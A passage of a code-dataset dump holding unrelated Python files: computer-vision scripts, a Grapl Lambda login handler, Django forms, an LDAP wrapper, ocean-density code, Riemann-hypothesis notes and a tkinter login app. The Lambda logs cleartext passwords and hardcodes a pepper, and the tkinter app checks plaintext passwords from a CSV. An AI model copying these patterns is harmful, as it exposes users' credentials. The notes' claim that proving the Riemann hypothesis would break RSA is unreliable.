leaves the site\n","sub_path":"functional_tests/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":8922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"1672112","text":"# USAGE\n# python real_time_object_detection.py --prototxt MobileNetSSD_deploy.prototxt.txt --model MobileNetSSD_deploy.caffemodel\n\n# import the necessary packages\nfrom imutils.video import VideoStream\nfrom imutils.video import FPS\nimport numpy as np\nimport argparse\nimport imutils\nimport time\nimport cv2\nfrom datetime import datetime,timedelta\n\n\"\"\"\nCLASSES = [\"background\", \"bolsas_te\", \"botella_plastica\", \"botella_vidrio\", \"carton_alimento\",\n\t\"carton_caja\", \"metal_latas\", 
\"papel\", \"residuo_banano\", \"residuo_huevo\", \"residuo_manzana\", \"residuo_naranaja\"]\n\"\"\"\nCLASSES = [\"background\", \"organico\", \"plastico\", \"vidrio\", \"cartòn o papel\",\n\t\"cartòn o papel\", \"metal\", \"cartòn o papel\", \"organico\", \"organico\", \"organico\", \"organico\"]\nCOLORS = np.random.uniform(0, 255, size=(len(CLASSES), 3))\n\nprint(\"[INFO] loading model...\")\nnet = cv2.dnn.readNetFromTensorflow(\"frozen_inference_graphV4.pb\", \"graph.pbtxt\")\n\nprint(\"[INFO] starting video stream...\")\n#vs = VideoStream(src=1).start()\nvs = VideoStream(src=0).start()\n\n\ndef adjust_gamma(image, gamma=1.0):\n\t# build a lookup table mapping the pixel values [0, 255] to\n\t# their adjusted gamma values\n\tinvGamma = 1.0 / gamma\n\ttable = np.array([((i / 255.0) ** invGamma) * 255\n\t\tfor i in np.arange(0, 256)]).astype(\"uint8\")\n\n\t# apply gamma correction using the lookup table\n\treturn cv2.LUT(image, table)\n\ndef red_neuronal(frame):\n (h, w) = frame.shape[:2]\n blob = cv2.dnn.blobFromImage(cv2.resize(frame, (300, 300)), size=(300, 300), swapRB=True, crop=False)\n net.setInput(blob)\n detections = net.forward()\n for i in np.arange(0, detections.shape[2]):\n confidence = detections[0, 0, i, 2]\n if confidence > 0.98:\n idx = int(detections[0, 0, i, 1])\n box = detections[0, 0, i, 3:7] * np.array([w, h, w, h])\n (startX, startY, endX, endY) = box.astype(\"int\")\n roi = frame[startY:endY, startX:endX]\n label = \"{}: {:.2f}%\".format(CLASSES[idx],confidence * 100)\n print(label)\n cv2.rectangle(frame, (startX, startY), (endX, endY),COLORS[idx], 2)\n #y = startY - 15 if startY - 15 > 15 else startY + 15\n #cv2.putText(frame, label, (startX, y),cv2.FONT_HERSHEY_SIMPLEX, 0.5, COLORS[idx], 2)\n #cv2.putText(roi, label, (startX, y),cv2.FONT_HERSHEY_SIMPLEX, 0.5, COLORS[idx], 2)\n #cv2.imshow(\"Resultado\", frame)\n print(\"--------------------------------------------------\")\n return frame\n\ntiempo_toma = 3\nwhile True:\n frame = vs.read()\n original = imutils.resize(frame, width=300)\n cv2.imshow(\"Captura\", original)\n key = cv2.waitKey(1) & 0xFF\n if key == ord(\"w\"):\n hora_actual = datetime.now()\n seg_ant = hora_actual.second\n loop_toma = True\n cont_tomas = 0\n while loop_toma:\n frame = vs.read()\n original = imutils.resize(frame, width=300)\n cv2.imshow(\"Captura\", original)\n key = cv2.waitKey(1) & 0xFF\n hora_actual = datetime.now()\n seg_act = hora_actual.second\n if (seg_act != seg_ant):\n tiempo_toma-=1\n seg_ant = seg_act\n if(tiempo_toma == 0):\n cont_tomas+=1\n red_neuronal(original)\n #cv2.imshow(\"toma\"+str(cont_tomas), original)\n tiempo_toma = 3\n if(cont_tomas >= 5):\n loop_toma = False\n \n if key == ord(\"q\"):\n break\ncv2.destroyAllWindows()\nvs.stop()\n","sub_path":"real_time_object_detection.py","file_name":"real_time_object_detection.py","file_ext":"py","file_size_in_byte":3519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"450414188","text":"import cv2\n\nimg = cv2.imread('img/stars.jpg', 1)\n\nimg = cv2.line(img, (0, 0), (255, 255), (0, 0, 255), 2) # draw a line. Image, origin, destiny, color, thikness\nimg = cv2.rectangle(img, (750, 750), (900, 850), (255, 0, 0), 3) # draw a rectangle. 
origin -> top left, destiny -> bottom right\r\nimg = cv2.circle(img, (600, 600), 63, (0, 255, 0), 5) # draw a circle\r\n\r\nfont = cv2.FONT_HERSHEY_SIMPLEX\r\nimg = cv2.putText(img, 'Text test', (800, 400), font, 4, (150, 60, 200), 10, cv2.LINE_AA)\r\n\r\ncv2.imshow('image', img)\r\n\r\ncv2.waitKey(0) # wait for any key press to close windows\r\ncv2.destroyAllWindows()","sub_path":"drawShape.py","file_name":"drawShape.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"322709193","text":"import json\nimport os\nimport time\nfrom hashlib import sha256, blake2b\nfrom hmac import compare_digest\nfrom random import uniform\nfrom typing import List, Dict, Any\n\nimport boto3\nimport jwt\nimport pydgraph\n\nJWT_SECRET = os.environ['JWT_SECRET']\nORIGIN = \"https://\" + os.environ['BUCKET_PREFIX'] + \"engagement-ux-bucket.s3.amazonaws.com\"\nDYNAMO = None\n\ndef list_all_lenses(prefix: str) -> List[Dict[str, Any]]:\n client_stub = pydgraph.DgraphClientStub('alpha0.engagementgraphcluster.grapl:9080')\n dg_client = pydgraph.DgraphClient(client_stub)\n\n # DGraph query for all nodes with a 'lens' that matches the 'prefix'\n if prefix:\n query = \"\"\"\n query q0($a: string)\n {\n q0(func: alloftext(lens, $a), orderdesc: score)\n {\n uid,\n node_key,\n lens,\n score\n }\n }\"\"\"\n\n variables = {'$a': prefix}\n else:\n query = \"\"\"\n {\n q0(func: has(lens), orderdesc: score)\n {\n uid,\n node_key,\n lens,\n score\n }\n }\"\"\"\n\n variables = {}\n\n txn = dg_client.txn(read_only=True)\n\n try:\n res = json.loads(txn.query(query, variables=variables).json)\n return res['q0']\n finally:\n txn.discard()\n\n# Just query the schema in the future\nprocess_properties = [\n 'process_id', 'node_key', 'create_time', 'arguments',\n 'process_name'\n]\n\nfile_properties = [\n 'node_key', 'file_path'\n]\n\n\nedge_names = [\n 'children',\n 'bin_file',\n 'created_file',\n 'scope',\n]\n\n# Get all nodes in a lens scope, and all of the edges from nodes in the scope to other nodes in the scope\ndef get_lens_scope(dg_client, lens):\n query = \"\"\"\n query q0($a: string)\n { \n q0(func: eq(lens, $a)) {\n uid,\n node_key,\n lens,\n score,\n scope {\n uid,\n expand(_forward_) {\n uid, \n node_key,\n process_name,\n process_id,\n file_path,\n node_type,\n port,\n created_timestamp,\n analyzer_name,\n risk_score,\n ~scope @filter(eq(lens, $a) OR has(risk_score)) {\n uid, node_key, analyzer_name, risk_score,\n lens, score\n }\n }\n }\n } \n }\"\"\"\n\n txn = dg_client.txn(read_only=True)\n\n try:\n variables = {'$a': lens}\n res = json.loads(txn.query(query, variables=variables).json)\n return res['q0']\n finally:\n txn.discard()\n\n\ndef hash_node(node):\n hash_str = str(node['uid'])\n print(node)\n props = []\n # iterate key/value pairs explicitly; iterating a dict directly yields only keys\n for prop_name, prop_value in node.items():\n if isinstance(prop_value, list):\n if len(prop_value) > 0 and isinstance(prop_value[0], dict):\n if prop_value[0].get('uid'):\n continue\n\n props.append(prop_name + str(prop_value))\n\n props.sort()\n hash_str += \"\".join(props)\n\n edges = []\n\n for prop_name, prop_value in node.items():\n if isinstance(prop_value, list):\n if len(prop_value) > 0 and isinstance(prop_value[0], dict):\n if not prop_value[0].get('uid'):\n continue\n edge_uids = []\n for edge in prop_value:\n # collect per-edge ids so they can be sorted for a stable hash\n edge_uids.append(prop_name + edge['uid'])\n\n edge_uids.sort()\n edges.append(\"\".join(edge_uids))\n\n edges.sort()\n print(edges)\n hash_str += \"\".join(edges)\n # return hash_str\n return sha256(hash_str.encode()).hexdigest()\n\n\ndef 
strip_graph(graph, lens, edgename='scope'):\n for outer_node in graph.get(edgename, []):\n for prop, val in outer_node.items():\n if prop == 'risks' or prop == '~risks':\n continue\n\n # guard against empty lists before indexing val[0]\n if isinstance(val, list) and val and isinstance(val[0], dict):\n new_vals = []\n for inner_val in val:\n rev_scope = inner_val.get('~scope', [])\n to_keep = False\n for n in rev_scope:\n if (n.get('lens') == lens) or n.get('analyzer_name'):\n to_keep = True\n if to_keep:\n new_vals.append(inner_val)\n outer_node[prop] = new_vals\n\n\ndef get_updated_graph(dg_client, initial_graph, lens):\n current_graph = get_lens_scope(dg_client, lens)\n for graph in current_graph:\n strip_graph(graph, lens)\n\n new_or_modified = []\n for node in current_graph:\n if initial_graph.get(node['uid']):\n node_hash = initial_graph[node['uid']]\n if node_hash != hash_node(node):\n new_or_modified.append(node)\n else:\n new_or_modified.append(node)\n\n all_uids = []\n for node in current_graph:\n if node.get('scope'):\n all_uids.extend([node['uid'] for node in node.get('scope')])\n all_uids.append(node['uid'])\n\n removed_uids = set(initial_graph.keys()) - \\\n set(all_uids)\n\n return new_or_modified, list(removed_uids)\n\n\ndef try_get_updated_graph(body):\n print('Trying to update graph')\n client_stub = pydgraph.DgraphClientStub('alpha0.engagementgraphcluster.grapl:9080')\n dg_client = pydgraph.DgraphClient(client_stub)\n\n lens = body[\"lens\"]\n\n # Mapping from `uid` to node hash\n initial_graph = body[\"uid_hashes\"]\n\n print(f'lens: {lens} initial_graph: {initial_graph}')\n\n # Try for 20 seconds max\n max_time = int(time.time()) + 20\n while True:\n print(\"Getting updated graph\")\n updated_nodes, removed_nodes = get_updated_graph(\n dg_client,\n initial_graph,\n lens\n )\n\n updates = {\n 'updated_nodes': updated_nodes,\n 'removed_nodes': removed_nodes\n }\n\n if updated_nodes or removed_nodes:\n print(\"Graph has been updated: \")\n return updates\n\n now = int(time.time())\n\n if now >= max_time:\n print(\"Timed out before finding an update\")\n return updates\n print(\"Graph has not updated\")\n time.sleep(0.75)\n\n\ndef respond(err, res=None, headers=None):\n if not headers:\n headers = {}\n return {\n 'statusCode': '400' if err else '200',\n 'body': {'error': err} if err else json.dumps({'success': res}),\n 'headers': {\n 'Access-Control-Allow-Origin': ORIGIN,\n 'Access-Control-Allow-Credentials': True,\n 'Content-Type': 'application/json',\n 'Access-Control-Allow-Methods': 'GET,POST,OPTIONS',\n 'X-Requested-With': '*',\n **headers\n },\n }\n\n\ndef get_salt_and_pw(table, username):\n print(f'Getting salt for user: {username}')\n response = table.get_item(\n Key={\n 'username': username,\n }\n )\n\n if not response.get('Item'):\n return None, None\n\n return response['Item']['salt'].value, response['Item']['password'].value\n\n\ndef hash_password(cleartext, salt) -> bytes:\n print('initial hash')\n hashed = sha256(cleartext).digest()\n\n hasher = blake2b(salt=salt)\n hasher.update(hashed)\n return hasher.digest()\n\n\ndef user_auth_table():\n global DYNAMO\n DYNAMO = DYNAMO or boto3.resource('dynamodb')\n\n return DYNAMO.Table(os.environ['USER_AUTH_TABLE'])\n\n\ndef create_user(username, cleartext):\n table = user_auth_table()\n # We hash before calling 'hashed_password' because the frontend will also perform\n # client side hashing\n pepper = \"f1dafbdcab924862a198deaa5b6bae29aef7f2a442f841da975f1c515529d254\"\n\n # assuming cleartext arrives as bytes (as in hash_password); encode the str pepper before concatenating\n hashed = sha256(cleartext + pepper.encode()).digest()\n for i in range(0, 5000):\n hashed = 
sha256(hashed).digest()\n\n salt = os.urandom(blake2b.SALT_SIZE)\n password = hash_password(hashed, salt)\n\n table.put_item(\n Item={\n 'username': username,\n 'salt': salt,\n 'password': password\n }\n )\n\n\ndef login(username, password):\n # Connect to dynamodb table\n table = user_auth_table()\n\n # Get salt for username\n salt, true_pw = get_salt_and_pw(table, username)\n if not salt or not true_pw:\n return None\n\n print(f'hashing password {password}')\n # Hash password\n to_check = hash_password(password.encode('utf8'), salt)\n print('hashed')\n\n if not compare_digest(to_check, true_pw):\n time.sleep(round(uniform(0.1, 3.0), 2))\n return None\n\n # Use JWT to generate token\n return jwt.encode({'username': username}, JWT_SECRET, algorithm='HS256').decode('utf8')\n\n\ndef check_jwt(headers):\n encoded_jwt = None\n print(f'headers: {headers}')\n for cookie in headers.get('Cookie', '').split(';'):\n if 'grapl_jwt=' in cookie:\n encoded_jwt = cookie.split('grapl_jwt=')[1].strip()\n\n if not encoded_jwt:\n return False\n\n try:\n jwt.decode(encoded_jwt, JWT_SECRET, algorithms=['HS256'])\n return True\n except Exception as e:\n print(e)\n return False\n\n\ndef lambda_login(event):\n body = json.loads(event['body'])\n print(f'body: {body}')\n login_res = login(body['username'], body['password'])\n # Clear out the password from the dict, to avoid accidentally logging it\n body['password'] = ''\n cookie = f\"grapl_jwt={login_res}; secure; HttpOnly; SameSite=None\"\n if login_res:\n return respond(None, 'True', headers={'Set-Cookie': cookie})\n else:\n return respond('Invalid user or password')\n\n\ndef lambda_handler(event, context):\n\n try:\n if event['httpMethod'] == 'OPTIONS':\n return respond(None, {})\n\n if '/login' in event['path']:\n return lambda_login(event)\n\n if '/checkLogin' in event['path']:\n print('logging in')\n if check_jwt(event['headers']):\n return respond(None, 'True')\n else:\n return respond(None, 'False')\n\n if not check_jwt(event['headers']):\n return respond(\"Must log in\")\n\n if '/update' in event['path']:\n update = try_get_updated_graph(json.loads(event[\"body\"]))\n return respond(None, update)\n\n if '/getLenses' in event['path']:\n prefix = json.loads(event[\"body\"]).get('prefix', '')\n lenses = list_all_lenses(prefix)\n return respond(None, {'lenses': lenses})\n\n return respond(f\"Invalid path: {event['path']}\", {})\n except Exception as e:\n print('Failed with e {}'.format(e))\n return respond(\"UnknownError\")\n\n","sub_path":"engagement_ux/engagement_edge/src/engagement_edge.py","file_name":"engagement_edge.py","file_ext":"py","file_size_in_byte":10974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"237473172","text":"# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n#\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is\n# regenerated.\n# --------------------------------------------------------------------------\n\nfrom msrest.serialization import Model\n\n\nclass RegenerateKeyParameters(Model):\n \"\"\"Parameters describes the request to regenerate access keys.\n\n :param key_type: The keyType to regenerate. Must be either 'primary' or\n 'secondary'(case-insensitive). 
Possible values include: 'Primary',\n 'Secondary'\n :type key_type: str or ~azure.mgmt.signalr.models.KeyType\n \"\"\"\n\n _attribute_map = {\n 'key_type': {'key': 'keyType', 'type': 'str'},\n }\n\n def __init__(self, *, key_type=None, **kwargs) -> None:\n super(RegenerateKeyParameters, self).__init__(**kwargs)\n self.key_type = key_type\n","sub_path":"sdk/signalr/azure-mgmt-signalr/azure/mgmt/signalr/models/regenerate_key_parameters_py3.py","file_name":"regenerate_key_parameters_py3.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"369204118","text":"from re import A\n\nfrom django.http import request\nfrom partidas.models import Partida\nfrom presupuestos.models import Presupuesto, Actividad, Transferencia\nfrom django.forms import ModelForm\nfrom enum import Enum , IntEnum\nfrom django.db import models\nfrom django import forms\nfrom django.shortcuts import render, HttpResponse \nclass PresupuestoForm(ModelForm):\n class Meta:\n model = Presupuesto\n fields = '__all__'\n\n\nclass ActividadForm(ModelForm):\n class Meta:\n model = Actividad\n fields = '__all__'\n\n\nclass TransferenciaForm(ModelForm):\n class Meta:\n model = Transferencia\n fields = '__all__'\n\n\n\nMES_CHOICES= [\n(1,'Enero' ),\n(2,'Febrero'),\n(3,'Marzo'),\n(4,'Abril'),\n(5,'Mayo' ),\n(6,'Junio'),\n(7,'Julio'),\n(8,'Agosto'),\n(9,'Septiembre'),\n(10,'Octubre'),\n(11,'Noviembre'),\n(12,'Diciembre')\n]\nmes = MES_CHOICES \n\n\nMES_NOMBRE_CHOICES= [\n('Enero',1 ),\n('Febrero',2),\n('Marzo', 3),\n('Abril', 4),\n('Mayo',5 ),\n('Junio',6),\n('Julio',7),\n('Agosto',8),\n('Septiembre',9),\n('Octubre',10),\n('Noviembre',11),\n('Diciembre',12)\n]\n#def obtenerAnio(request):\n# anioSesion = [(request.session['anio'],str(request.session['anio']))]\n# return anioSesion\n#ANIO_CHOICES = [(2021,'2021')] \n#\n#ANIO_CHOICES = [] \n#anio=ANIO_CHOICES\n\nclass ActividadForm(ModelForm): \n mes = forms.ChoiceField(choices=MES_CHOICES, widget=forms.Select(attrs={\n 'class': 'form-control'}))\n #anio = forms.ChoiceField(choices=ANIO_CHOICES, widget=forms.Select(attrs={\n # 'class': 'form-control'}))\n \n class Meta:\n model = Actividad\n fields = ( 'programa', 'componente' , 'actividad' ,'monto', 'mes', 'descripcion', 'partida', 'anio')\n widgets = {\n 'programa': forms.NumberInput(attrs={'class': 'form-control'}),\n 'componente' : forms.NumberInput(attrs={'class': 'form-control'}),\n 'actividad': forms.NumberInput(attrs={'class': 'form-control'}),\n 'monto': forms.NumberInput(attrs={'class': 'form-control'}),\n 'descripcion': forms.TextInput(attrs={'class': 'form-control'}),\n 'partida': forms.Select(attrs={'class': 'form-control'}),\n 'anio':forms.Select(attrs={'class': 'form-control'}),\n }\n \n ","sub_path":"presupuestos/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"82139381","text":"import ldap\nimport ldap.filter\nfrom .ldapprobject import LdapprObject\nfrom uuid import UUID\n\n\nclass Connection(object):\n \"\"\"Initiates connection with handy methods\"\"\"\n def __init__(self, server, protocol='ldap', port='', verify=True,\n search_base=''):\n self.search_base = search_base\n if port == '':\n port = 389 if protocol == 'ldap' else 636\n self.ldap_url = '{}://{}:{}'.format(protocol, server, str(port))\n try:\n ldap.set_option(ldap.OPT_REFERRALS, 0)\n if not verify:\n 
ldap.set_option(ldap.OPT_X_TLS_REQUIRE_CERT,\n ldap.OPT_X_TLS_NEVER)\n self.conn = ldap.initialize(self.ldap_url)\n except:\n raise\n\n def type(self):\n result = self.conn.search_s('', ldap.SCOPE_BASE,\n attrlist=['objectClass', 'vendorName',\n 'supportedCapabilities'])\n rootDSE = LdapprObject(result[0], self.conn)\n if rootDSE.attrs['vendorName'] == ['Novell, Inc.']:\n return 'eDirectory'\n if '1.2.840.113556.1.4.800' in rootDSE.attrs['supportedCapabilities']:\n return 'Active Directory'\n if rootDSE.attrs['vendorName'] == ['Apache Software Foundation']:\n return 'Apache DS'\n if 'OpenLDAProotDSE' in rootDSE.attrs['objectClass']:\n return 'OpenLDAP'\n return 'Unknown'\n\n def search(self, search_filter):\n \"\"\"Get list of objects that match the search_filter\n\n :param search_filter: filter to find the objects\n :return: list of LdapperObjects (or empty list)\n \"\"\"\n search_filter = ldap.filter.escape_filter_chars(search_filter)\n result = self.conn.search_s(self.search_base, ldap.SCOPE_SUBTREE,\n search_filter)\n return [LdapprObject(item, self.conn) for item in result if item[0] != None ]\n def search_by_guid(self, guid):\n \"\"\"Get object that match the objectGuid\n\n :guid GUID like XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX\n :return: list of LdapperObjects (or empty list)\n \"\"\"\n u = UUID(guid)\n search_filter = '(objectguid=%s)' % ''.join(['\\\\%s' % u.hex[i:i+2] for i in range(0, len(u.hex), 2)])\n result = self.conn.search_s(self.search_base, ldap.SCOPE_SUBTREE,\n search_filter)\n return [LdapprObject(item, self.conn) for item in result if item[0] != None ]\n\n def get(self, search_filter):\n \"\"\"Get first object found\n\n :param search_filter: filter to find the object\n :return: LdapprObject or None\n \"\"\"\n # TODO: use sizelimit=1 with proper exception handling\n search_filter = ldap.filter.escape_filter_chars(search_filter)\n result = self.conn.search_ext_s(self.search_base,\n ldap.SCOPE_SUBTREE,\n search_filter, sizelimit=0)\n return LdapprObject(result[0], self.conn) if result else None\n\n def get_by_dn(self, dn):\n \"\"\"Get LdapprObject for known dn\n\n :param dn: dn of the object we're looking for\n :return: LdapprObject\n \"\"\"\n result = self.conn.search_s(dn, ldap.SCOPE_BASE)\n return LdapprObject(result[0], self.conn)\n \n def get_dn(self, search_filter):\n \"\"\"Get list of dn's that match the filter\n\n :param search_filter: filter to find the dn's\n :return: list of dn's\n \"\"\"\n search_filter = ldap.filter.escape_filter_chars(search_filter)\n result = self.conn.search_s(self.search_base, ldap.SCOPE_SUBTREE,\n search_filter)\n return [dn for (dn, item) in result if item[0] != None]\n\n def get_values(self, dn, attr):\n \"\"\"Get list of values of given attribute for dn\n\n :param dn: dn of the object we're looking for\n :param attr: attribute name (case insensitive)\n :return: list of values\n \"\"\"\n result = self.conn.search_s(dn, ldap.SCOPE_BASE)\n result_object = LdapprObject(result[0], self.conn)\n return result_object.attrs[attr]\n\n def get_value(self, dn, attr):\n \"\"\"Get (first) attr value as string\n\n :param dn: dn of the object we're looking for\n :param attr: attribute name (case insensitive)\n :return: value as string\n \"\"\"\n result = self.get_values(dn, attr)\n return result[0]\n\n def verify_password(self, dn, password):\n try:\n test_conn = ldap.initialize(self.ldap_url)\n test_conn.simple_bind_s(dn, password)\n test_conn.unbind_s()\n except ldap.LDAPError:\n return False\n return True\n\n def close(self):\n 
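# Illustrative usage sketch (not part of the original module; the host, DN and
# password below are hypothetical placeholders) showing the lifecycle of the
# Connection class defined above:
#   conn = Connection('ldap.example.com', search_base='dc=example,dc=com')
#   entry = conn.get_by_dn('cn=admin,dc=example,dc=com')
#   ok = conn.verify_password('cn=admin,dc=example,dc=com', 'secret')
#   conn.close()  # unbind when finished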
self.conn.unbind_s()\n\n\nclass AuthConnection(Connection):\n def __init__(self, server, bind_dn, password, **kwargs):\n super(AuthConnection, self).__init__(server, **kwargs)\n try:\n self.conn.simple_bind_s(bind_dn, password)\n except ldap.LDAPError:\n raise\n\n def add(self, dn, modlist):\n \"\"\"Adds an entry to the LDAP store\n\n :param dn: dn of the new entry\n :param modlist: list of attributes made up of two-value tuples, where\n the first item of each tuple is the attribute name, and the\n second value is a list of attribute values.\n \"\"\"\n self.conn.add_s(dn, modlist)\n\n def modify(self, dn, modlist):\n self.conn.modify_s(dn, modlist)\n\n def set_value(self, dn, attr, value):\n self.conn.modify_s(dn, [(ldap.MOD_REPLACE, attr, value)])\n\n def add_value(self, dn, attr, value):\n self.conn.modify_s(dn, [(ldap.MOD_ADD, attr, value)])\n\n def delete_value(self, dn, attr, value):\n self.conn.modify_s(dn, [(ldap.MOD_DELETE, attr, value)])\n\n def delete(self, dn):\n self.conn.delete_s(dn)\n","sub_path":"ldappr/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":5965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"68689711","text":"import xarray as xr\nfrom functools import partial\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom profile import Profile\nimport gsw \nimport pickle\nfrom .lib.bottle_to_cast import bottle_to_cast\nimport os, pygamma_n\ntemplate = os.path.join(pygamma_n.__path__[0], 'util', 'refprofiles.nc')\n\nrefdata = xr.open_dataset(template)\n\ndef replaceNAN(m):\n nans = np.isnan(m[0])\n col_mean = np.nanmean(m, axis=0)\n inds = np.where(np.isnan(m))\n m[inds] = np.take(col_mean, inds[1])\n return m\n\n\ndef gamma_n(refdata,s,t,p,lon,lat):\n if isinstance(lat,float) or isinstance(lat,float) :\n lat = np.asarray([lat]*len(s))\n lon = np.asarray([lon]*len(s))\n else:\n lat = np.asarray(lat)\n lon = np.asarray(lon)\n lon[lon<0] = lon[lon<0]+360\n lats = np.asarray(refdata.coords[\"lat\"]).flatten() \n lons = np.asarray(refdata.coords[\"lon\"]).flatten() \n lati = np.floor(1 + (len(lats)-1)*(lat-lats[0])/(lats[-1]-lats[0])).astype(int)\n lati = [lati,lati-1]\n loni = ((np.floor(1+ (len(lons) - 1)*(lon-lons[0])/((lons[-1]-lons[0]))))-1).astype(int)\n loni = [loni,loni+1]\n ref_s,ref_t,ref_p,ref_gamma,ds=[[],[],[],[],[]]\n #hard coding combinations in to enforce order\n refpres = np.empty((len(lat),len(refdata.coords[\"pres\"])))\n for coords in [[lati[1],loni[0]],[lati[0],loni[0]],[lati[0],loni[1]],[lati[1],loni[1]]]:\n l1 = xr.DataArray(coords[1])\n l2 = xr.DataArray(coords[0])\n reftemp = np.asarray(refdata[\"t\"][l1,l2])\n refsal = np.asarray(refdata[\"s\"][l1,l2])\n refgamma = np.asarray(refdata[\"gamma\"][l1,l2])\n refpres[:] = refdata.coords[\"pres\"]\n sref,tref,pref,gammaref = bottle_to_cast(s,t,p,refsal,reftemp,refpres,refgamma)\n ref_s.append(sref)\n ref_t.append(tref)\n ref_p.append(pref)\n ref_gamma.append(gammaref)\n #ds.append(np.sqrt(np.square((lon-lons[coords[1]])/(loni[1]-loni[0]))+np.square((lat-lats[coords[0]])/(lati[1]-lati[0]))))\n \n \n ref_s,ref_p,ref_t,ref_gamma = replaceNAN(np.asarray(ref_s)),\\\n replaceNAN(np.asarray(ref_p)),replaceNAN(np.asarray(ref_t)),replaceNAN(np.asarray(ref_gamma))\n\n #ds = np.asarray(ds)/np.nansum(ds,axis=0)\n #gamma_n = np.nansum((ref_gamma.T * ds.T),axis=-1)\n rx = (lon-lons[loni[0]])/(lons[loni[0]+1]-lons[loni[0]])\n ry = (lat-lats[lati[0]])/(lats[lati[0]+1]-lats[lati[0]])\n\n gamma_n = (1-ry)*(ref_gamma[0] + 
rx*(ref_gamma[1] - ref_gamma[0])) + ry*(ref_gamma[3] + rx*(ref_gamma[2] - ref_gamma[3]))\n\n return gamma_n, [0,0,0]\n \n\ngamma_n = partial(gamma_n,refdata)\n\ndef neutralsurfaces(s,t,p,gamma_n,surfaces):\n sals=[]\n temps=[]\n pres = []\n for surf in surfaces:\n solp = np.interp(surf,np.asarray(gamma_n).flatten(),np.asarray(p).flatten())\n pres.append(solp)\n sals.append(np.interp(solp,p,s))\n temps.append(np.interp(solp,p,t))\n return sals,temps,pres\n\n \n","sub_path":"pygamma_n/gamma_n.py","file_name":"gamma_n.py","file_ext":"py","file_size_in_byte":2931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"455221959","text":"# Riemann-Hypothesis\n#Conjectures and theories about the Riemann-Zeta hypothesis \n\n#Inspirational quotes:\n#\"God made the integers, all the rest is the work of man.\"(Leopold Kronecker, Philosophies of Mathematics)\n#\"some mathematicians consider it the most important unresolved problem in pure mathematics\"(Bombieri 2000).\n\n#A proof of the Riemann-Zeta hypothesis would prove that the primes have a discernible distribution. This distribution would be used to generate a descriptive list of the primes. This would bring the world economy crashing down as the vast majority of bank accounts, credit&debit cards, messaging systems, etc. use RSA encryption. \n\n#(explain RSA)\n\n#For almost two centuries, the proof for this hypothesis has eluded mathematicians. \n\n#Idea: A seemingly impossible encryption, or in this instance a distribution, could be cracked by feeding back the encrypted data (the primes in this instance)\n\n#let p_0,p_1,.... be the list of primes where p_0 = 2, p_i is the i-th prime\n\np = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97, 101, 103, 107, 109, 113, 127, 131, 137, 139, 149, 151, 157, 163, 167, 173, 179, 181, 191, 193, 197, 199]\n\nq = []  # ratio of each prime to the product of the primes before it\nfor i in range(30):\n q.append(p[i])\n for j in range(i):\n q[i] = q[i]/p[j]  # divide by each earlier prime p[j] (the original divided by p[i])\nprint(q)\n \n","sub_path":"roughdraft.py","file_name":"roughdraft.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"173506130","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Feb 28 01:58:51 2021\r\n\"\"\"\r\nimport tkinter as tk \r\nfrom tkinter import * \r\nfrom pandas import DataFrame\r\nimport pandas as pd\r\nfrom tkinter import ttk\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\r\nimport numpy as np\r\nimport time\r\n\r\n\r\n \r\nprogramme = tk.Tk()\r\nprogramme.title(\"Flight Analyses System\")\r\nprogramme.geometry(\"720x480\")\r\n###-----------------------------------------------------Partie1-------------------------------------------------------------------------\r\n#Fonction\r\ndef login():\r\n a = 0\r\n i = 0\r\n df=pd.read_csv(\"user_info.csv\",delimiter=(\",\"))\r\n df2=pd.read_csv(\"user_login.csv\")\r\n confirmation = 0\r\n for csv_email in df['email']:\r\n i=i+1\r\n if str(csv_email)== Entree1.get():\r\n numero = i-1\r\n password = df['password']\r\n if str(password[numero]) == Entree2.get():\r\n confirmation = 1\r\n break\r\n if confirmation == 1:\r\n affichage_resultat1 = tk.Label(o1, text=\"Bienvenue dans le système d’analyses !\")\r\n affichage_resultat1.grid(column=1, row=5)\r\n affichage_resultat1.after(3000, affichage_resultat1.destroy) \r\n print('oui')\r\n maj = {'number': i, 'email': Entree1.get(), 'date': time.strftime(\"%d/%m/%y\"), 
